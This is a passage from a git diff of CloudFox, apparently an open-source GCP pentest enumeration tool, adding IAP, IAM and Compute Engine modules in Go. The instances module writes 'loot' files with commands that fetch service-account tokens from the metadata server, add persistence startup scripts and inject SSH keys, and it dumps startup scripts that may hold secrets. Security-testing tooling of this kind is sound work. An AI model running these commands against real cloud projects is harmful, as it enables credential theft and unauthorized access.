tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Add custom roles + for _, role := range m.CustomRoles { + deleted := "" + if role.Deleted { + deleted = " (deleted)" + } -// LootFiles can be implemented if needed -func (g GCPIAMResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} -} + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + 
"CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", // Custom roles are not federated identities + }) + } -// Houses high-level logic that retrieves IAM information and writes to output -func runGCPIAMCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs and resource type from parent (gcp command) ctx - var projectIDs []string - var resourceType string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_IAM_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Build tables + tables := []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, } - // TODO fix once folders or organizations are supported as input for project root - resourceType = "project" + // Log warnings for security findings + if publicAccessFound { + logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) + } + if saWithKeys > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) + } + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege role binding(s)!", highPrivCount), globals.GCP_IAM_MODULE_NAME) + } - // Initialize 
IAMService and fetch principals with roles for the given projectIDs and resource type - iamService := IAMService.New() - var results []IAMService.PrincipalWithRoles - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - principals, err := iamService.PrincipalsWithRoles(projectID, resourceType) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - results = append(results, principals...) - logger.InfoM(fmt.Sprintf("Done retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - cloudfoxOutput := GCPIAMResults{Data: results} - - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_IAM_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return - } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_IAM_MODULE_NAME) + output := IAMOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else 
{ + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go new file mode 100644 index 00000000..2d33a1fe --- /dev/null +++ b/gcp/commands/iap.go @@ -0,0 +1,203 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iapservice "github.com/BishopFox/cloudfox/gcp/services/iapService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIAPCommand = &cobra.Command{ + Use: globals.GCP_IAP_MODULE_NAME, + Aliases: []string{"identity-aware-proxy"}, + Short: "Enumerate Identity-Aware Proxy configurations", + Long: `Enumerate Identity-Aware Proxy (IAP) configurations. 
+ +Features: +- Lists IAP tunnel destination groups +- Analyzes IAP settings and bindings +- Identifies overly permissive tunnel configurations +- Checks for public access to IAP resources`, + Run: runGCPIAPCommand, +} + +type IAPModule struct { + gcpinternal.BaseGCPModule + TunnelDestGroups []iapservice.TunnelDestGroup + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type IAPOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAPOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAPOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPIAPCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAP_MODULE_NAME) + if err != nil { + return + } + + module := &IAPModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + TunnelDestGroups: []iapservice.TunnelDestGroup{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) + + if len(m.TunnelDestGroups) == 0 { + logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", + len(m.TunnelDestGroups)), globals.GCP_IAP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *IAPModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) + } + + svc := iapservice.New() + + // Get tunnel destination groups + groups, err := svc.ListTunnelDestGroups(projectID) + if err != nil { + m.CommandCounter.Error++ + 
gcpinternal.HandleGCPError(err, logger, globals.GCP_IAP_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) + } else { + m.mu.Lock() + m.TunnelDestGroups = append(m.TunnelDestGroups, groups...) + for _, group := range groups { + m.addToLoot(group) + } + m.mu.Unlock() + } +} + +func (m *IAPModule) initializeLootFiles() { + m.LootMap["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { + m.LootMap["iap-commands"].Contents += fmt.Sprintf( + "## Tunnel Destination Group: %s (Project: %s, Region: %s)\n"+ + "# CIDRs: %s\n"+ + "# FQDNs: %s\n\n"+ + "# Describe tunnel destination group:\n"+ + "gcloud iap tcp dest-groups describe %s --region=%s --project=%s\n\n"+ + "# List IAM policy for tunnel destination group:\n"+ + "gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s\n\n", + group.Name, group.ProjectID, group.Region, + strings.Join(group.CIDRs, ", "), + strings.Join(group.FQDNs, ", "), + group.Name, group.Region, group.ProjectID, + group.Name, group.Region, group.ProjectID, + ) +} + +func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Tunnel Destination Groups table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "CIDRs", + "FQDNs", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, group := range m.TunnelDestGroups { + // No truncation - show full content + cidrs := strings.Join(group.CIDRs, ", ") + if cidrs == "" { + cidrs = "-" + } + fqdns := strings.Join(group.FQDNs, ", ") + if fqdns == "" { + fqdns = "-" + } + + // If group has IAM bindings, create one row per binding + if len(group.IAMBindings) > 0 { + for _, binding := range group.IAMBindings { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + 
group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + "-", + "-", + }) + } + } + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := IAPOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 79334951..af9d81b6 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,126 +1,590 @@ package commands import ( + "context" "fmt" + "strings" + "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPInstancesCommand = &cobra.Command{ - Use: globals.GCP_INSTANCES_MODULE_NAME, // This should be defined in the globals package - Aliases: []string{}, - Short: "Display GCP Compute Engine instances information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Compute Engine instances information: -cloudfox gcp instances`, + Use: 
globals.GCP_INSTANCES_MODULE_NAME, + Aliases: []string{"vms", "compute", "ssh", "oslogin"}, + Short: "Enumerate GCP Compute Engine instances with security configuration", + Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. + +Features: +- Lists all instances with network and security configuration +- Shows attached service accounts and their scopes +- Identifies instances with default service accounts or broad scopes +- Shows Shielded VM, Secure Boot, and Confidential VM status +- Shows OS Login configuration (enabled, 2FA, block project keys) +- Shows serial port and disk encryption configuration +- Extracts SSH keys from project and instance metadata +- Extracts startup scripts (may contain secrets) +- Generates gcloud commands for instance access and exploitation + +Security Columns: +- ExternalIP: Instances with external IPs are internet-accessible +- DefaultSA: Uses default compute service account (security risk) +- BroadScopes: Has cloud-platform or other broad OAuth scopes +- OSLogin: OS Login enabled (recommended for access control) +- OSLogin2FA: OS Login with 2FA required +- BlockProjKeys: Instance blocks project-wide SSH keys +- SerialPort: Serial port access enabled (security risk if exposed) +- CanIPForward: Can forward packets (potential for lateral movement) +- ShieldedVM/SecureBoot/vTPM/Integrity: Hardware security features +- Confidential: Confidential computing enabled +- Encryption: Boot disk encryption type (Google-managed, CMEK, CSEK)`, Run: runGCPInstancesCommand, } -// GCPInstancesResults implements internal.OutputInterface for Compute Engine instances -type GCPInstancesResults struct { - Data []ComputeEngineService.ComputeEngineInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type InstancesModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Instances []ComputeEngineService.ComputeEngineInfo + 
ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type InstancesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InstancesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InstancesOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPInstancesCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_INSTANCES_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &InstancesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []ComputeEngineService.ComputeEngineInfo{}, + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) + + // Check results + if len(m.Instances) == 0 { + logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_INSTANCES_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called 
concurrently for each project) +// ------------------------------ +func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + + // Create service and fetch instances with project metadata + ces := ComputeEngineService.New() + instances, projectMeta, err := ces.InstancesWithMetadata(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_INSTANCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate instances in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + m.ProjectMetadata[projectID] = projectMeta + + // Generate loot for each instance + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + + // Add project metadata to loot + m.addProjectMetadataToLoot(projectMeta) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *InstancesModule) initializeLootFiles() { + m.LootMap["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# PROJECT-LEVEL METADATA (Project: %s)\n"+ + "# ==========================================\n"+ + "# OS Login: 
%v, OS Login 2FA: %v, Serial Port: %v\n", + meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + ) + + // Project-level SSH keys + if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Project SSH Keys: %d (apply to ALL instances not blocking project keys)\n", + len(meta.ProjectSSHKeys), + ) + for _, key := range meta.ProjectSSHKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + } + } + + // Project-level startup script + if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# PROJECT STARTUP SCRIPT (runs on ALL instances):\n"+ + "# ------- BEGIN -------\n"+ + "%s\n"+ + "# ------- END -------\n", + meta.ProjectStartupScript, + ) + } + + // Custom metadata keys at project level + if len(meta.CustomMetadataKeys) > 0 { + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + for _, key := range meta.CustomMetadataKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + } + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Get project metadata:\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + meta.ProjectID, + ) +} + +func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.ComputeEngineInfo) { + // Build service account string + var saEmails []string + for _, sa := range instance.ServiceAccounts { + saEmails = append(saEmails, sa.Email) + } + saString := strings.Join(saEmails, ", ") + if saString == "" { + saString = "-" + } + + // External IP for display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "None" + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# 
==========================================\n"+ + "# State: %s, Machine Type: %s\n"+ + "# External IP: %s, Internal IP: %s\n"+ + "# Service Account: %s\n"+ + "# Default SA: %v, Broad Scopes: %v\n"+ + "# OS Login: %v, OS Login 2FA: %v, Block Project Keys: %v\n"+ + "# Serial Port: %v, Shielded VM: %v, Secure Boot: %v\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.State, instance.MachineType, + externalIP, instance.InternalIP, + saString, + instance.HasDefaultSA, instance.HasCloudScopes, + instance.OSLoginEnabled, instance.OSLogin2FAEnabled, instance.BlockProjectSSHKeys, + instance.SerialPortEnabled, instance.ShieldedVM, instance.SecureBoot, + ) + + // SSH keys on this instance + if len(instance.SSHKeys) > 0 { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) + for _, key := range instance.SSHKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + } + } + + // Startup script content + if instance.StartupScriptContent != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# STARTUP SCRIPT (may contain secrets):\n"+ + "# ------- BEGIN -------\n"+ + "%s\n"+ + "# ------- END -------\n", + instance.StartupScriptContent, + ) + } + if instance.StartupScriptURL != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Startup Script URL: %s\n"+ + "# Fetch with: gsutil cat %s\n", + instance.StartupScriptURL, instance.StartupScriptURL, + ) + } + + // Custom metadata keys + if len(instance.CustomMetadata) > 0 { + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + for _, key := range instance.CustomMetadata { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + } + } + + // Commands section + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud 
compute instances get-iam-policy %s --zone=%s --project=%s\n"+
+			"# Get serial port output:\n"+
+			"gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n"+
+			"# Get metadata:\n"+
+			"gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n",
+		instance.Name, instance.Zone, instance.ProjectID,
+		instance.Name, instance.Zone, instance.ProjectID,
+		instance.Name, instance.Zone, instance.ProjectID,
+		instance.Name, instance.Zone, instance.ProjectID,
+	)
+
+	// SSH commands
+	if instance.ExternalIP != "" {
+		m.LootMap["instances-commands"].Contents += fmt.Sprintf(
+			"# SSH (external IP):\n"+
+				"gcloud compute ssh %s --zone=%s --project=%s\n"+
+				"# Direct SSH (if OS Login disabled):\n"+
+				"ssh -i ~/.ssh/google_compute_engine USERNAME@%s\n",
+			instance.Name, instance.Zone, instance.ProjectID,
+			instance.ExternalIP,
+		)
+	} else {
+		m.LootMap["instances-commands"].Contents += fmt.Sprintf(
+			"# SSH via IAP tunnel (no external IP):\n"+
+				"gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n",
+			instance.Name, instance.Zone, instance.ProjectID,
+		)
+	}
+
+	// Exploitation commands
+	m.LootMap["instances-commands"].Contents += fmt.Sprintf(
+		"# Metadata from inside instance:\n"+
+			"curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+
+			"# Get service account token:\n"+
+			"curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n"+
+			"# Add startup script (persistence):\n"+
+			"gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+
+			"# Add SSH keys:\n"+
+			"gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata-from-file=ssh-keys=\n\n",
+		instance.Name, instance.Zone, instance.ProjectID,
+		instance.Name, instance.Zone, instance.ProjectID,
+	)
+}
+
+// ------------------------------
+// Helper Functions
+// 
------------------------------ + +// SSHKeyParts contains parsed SSH key components +type SSHKeyParts struct { + Username string + KeyType string + KeyTruncated string + Comment string } -func (g GCPInstancesResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// parseSSHKeyLine parses a GCP SSH key line (format: user:ssh-rsa KEY comment) +func parseSSHKeyLine(line string) SSHKeyParts { + parts := SSHKeyParts{ + Username: "-", + KeyType: "-", + KeyTruncated: "-", + Comment: "", + } + + // Split on first colon to get username + colonIdx := strings.Index(line, ":") + if colonIdx > 0 { + parts.Username = line[:colonIdx] + line = line[colonIdx+1:] + } + // Split remaining by spaces: key-type KEY comment + fields := strings.Fields(line) + if len(fields) >= 1 { + parts.KeyType = fields[0] + } + if len(fields) >= 2 { + key := fields[1] + if len(key) > 20 { + parts.KeyTruncated = key[:10] + "..." + key[len(key)-10:] + } else { + parts.KeyTruncated = key + } + } + if len(fields) >= 3 { + parts.Comment = strings.Join(fields[2:], " ") + } + + return parts +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single combined table with all security-relevant columns and IAM bindings header := []string{ + "Project Name", + "Project ID", "Name", - "ID", - "State", - "ExternalIP", - "InternalIP", - "ServiceAccount", // Adding ServiceAccount to the header "Zone", - "ProjectID", + "State", + "Machine Type", + "External IP", + "Internal IP", + "Service Account", + "Scopes", + "Default SA", + "Broad Scopes", + "OS Login", + "OS Login 2FA", + "Block Proj Keys", + "Serial Port", + "IP Forward", + "Shielded VM", + "Secure Boot", + "vTPM", + "Integrity", + "Confidential", + "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", } var body [][]string - for _, instance := range g.Data { - // Initialize an empty string to 
aggregate service account emails - var serviceAccountEmails string - for _, serviceAccount := range instance.ServiceAccounts { - // Assuming each instance can have multiple service accounts, concatenate their emails - if serviceAccountEmails != "" { - serviceAccountEmails += "; " // Use semicolon as a delimiter for multiple emails - } - serviceAccountEmails += serviceAccount.Email + for _, instance := range m.Instances { + // Get first service account email (most instances have just one) + saEmail := "-" + scopes := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) + } + + // External IP display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + // Encryption display + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + + // KMS Key display + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" } - body = append(body, []string{ + // Base row data (reused for each IAM binding) + baseRow := []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, instance.Name, - instance.ID, + instance.Zone, instance.State, - instance.ExternalIP, + instance.MachineType, + externalIP, instance.InternalIP, - serviceAccountEmails, // Add the aggregated service account emails to the output - instance.Zone, - instance.ProjectID, - }) - } + saEmail, + scopes, + boolToYesNo(instance.HasDefaultSA), + boolToYesNo(instance.HasCloudScopes), + boolToYesNo(instance.OSLoginEnabled), + boolToYesNo(instance.OSLogin2FAEnabled), + boolToYesNo(instance.BlockProjectSSHKeys), + boolToYesNo(instance.SerialPortEnabled), + boolToYesNo(instance.CanIPForward), + boolToYesNo(instance.ShieldedVM), + boolToYesNo(instance.SecureBoot), + boolToYesNo(instance.VTPMEnabled), + boolToYesNo(instance.IntegrityMonitoring), + boolToYesNo(instance.ConfidentialVM), + encryption, + kmsKey, + } - 
tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_INSTANCES_MODULE_NAME, - Header: header, - Body: body, - }) + // If instance has IAM bindings, create one row per binding + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + body = append(body, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + body = append(body, row) + } + } - return tableFiles -} + // SSH keys table (pentest-focused - keep separate) + sshKeysHeader := []string{ + "Project Name", + "Project ID", + "Source", + "Zone", + "Username", + "Key Type", + "Key (truncated)", + } -func (g GCPInstancesResults) LootFiles() []internal.LootFile { - // Define any loot files if applicable - return []internal.LootFile{} -} + var sshKeysBody [][]string -func runGCPInstancesCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_INSTANCES_MODULE_NAME) - return + // Add project-level SSH keys + for projectID, meta := range m.ProjectMetadata { + if meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + m.GetProjectName(projectID), + projectID, + "PROJECT", + "-", + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", 
globals.GCP_IAM_MODULE_NAME) + // Add instance-level SSH keys + for _, instance := range m.Instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Zone, + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } } - ces := ComputeEngineService.New() - var results []ComputeEngineService.ComputeEngineInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - result, err := ces.Instances(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - cloudfoxOutput := GCPInstancesResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_INSTANCES_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return + // Collect loot files (only if content was added beyond header) + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM("Done writing output", globals.GCP_INSTANCES_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }, + } + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go new file mode 100644 index 00000000..4ae10519 --- /dev/null +++ b/gcp/commands/keys.go @@ -0,0 +1,415 @@ +package commands + +import ( + "context" + 
